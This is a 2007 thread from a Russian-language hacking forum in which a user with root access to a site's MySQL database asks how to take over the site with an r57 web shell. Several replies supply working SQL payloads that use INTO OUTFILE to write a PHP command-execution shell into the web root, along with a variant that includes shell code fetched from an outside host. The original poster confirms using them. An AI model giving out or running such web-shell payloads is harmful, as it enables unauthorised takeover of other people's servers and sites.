HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

MySQL и root доступ
  #1  
Старый 15.07.2007, 14:49
Gargulia
Banned
Регистрация: 22.06.2007
Сообщений: 7
С нами: 9941240

Репутация: -24
По умолчанию MySQL и root доступ

народ есть такая проблемка: имеется root доступ к MySQL... как подмять по себя сайт, r57 кидануть?
былобы все проще если бы на сервере были скрипты работающие с MySQL, но таковых не нашлось... вот сижу и туплю - че делать?
 

  #2  
Старый 15.07.2007, 15:06
Ni0x
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
С нами: 10370602

Репутация: 472
По умолчанию

все зависит от твоей цели, если нужен сайт, то залей шелл.
 

  #3  
Старый 15.07.2007, 15:06
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

либо remote connect любым клиентом, гоу ту гугл.. если нет возможности удаленно управлять базой, то нужно залить на сервер какой-нибудь пхп-скрипт, недавно выкладывали РСТшные релизы, там была тулза для локальной работы с дб. ищи на форуме =)
 

  #4  
Старый 15.07.2007, 15:33
Gargulia
Banned
Регистрация: 22.06.2007
Сообщений: 7
С нами: 9941240

Репутация: -24
По умолчанию

народ вы меня видимо немножко не так поняли...
У меня уже есть root к базе, я не знаю как залить туда шелл, вот в чем проблема...
есть какиенибудь мыслишки?
 

  #5  
Старый 15.07.2007, 15:40
Ni0x
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
С нами: 10370602

Репутация: 472
По умолчанию

используй
Цитата:
INTO OUTFILE

Последний раз редактировалось Ni0x; 15.07.2007 в 15:43..
 

  #6  
Старый 15.07.2007, 15:43
helat
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
С нами: 10157802

Репутация: 156
По умолчанию

я понял что ему надо.
ему надо через бд залить шелл.
Ты говориш что нет скриптов какие работают с бд.
такоко не может быть ибо бессмысленно было ставить мускул (ведь это не хостинг (Тк как рута на хостинге врятли можно взять))
Гдето на форуме писали что через команду мускула льёться шелл.
поиши что то типа Шелл через бд или в этом роде
 

  #7  
Старый 15.07.2007, 15:47
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами: 10533245

Репутация: 773


По умолчанию

Узнаешь DOCUMENT_ROOT, потом
select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'
select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';
 

  #8  
Старый 15.07.2007, 15:51
helat
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
С нами: 10157802

Репутация: 156
По умолчанию

SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

Вот был пример с пхп ББ
 

  #9  
Старый 15.07.2007, 15:56
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами: 10488959

Репутация: 474
По умолчанию

Это если filepriv включен =)
и есть права на запись в папку

Последний раз редактировалось ENFIX; 15.07.2007 в 15:58..
 

  #10  
Старый 15.07.2007, 16:49
Gargulia
Banned
Регистрация: 22.06.2007
Сообщений: 7
С нами: 9941240

Репутация: -24
По умолчанию

всем спасибо.... я уже догнал Ni0x доходчиво объяснил....
а за это: select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';

отдельное спасибо, ато я страдал сначало с маленьким шелом(прямо в запросе SELECT), что б патом тока через него залить r57...
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.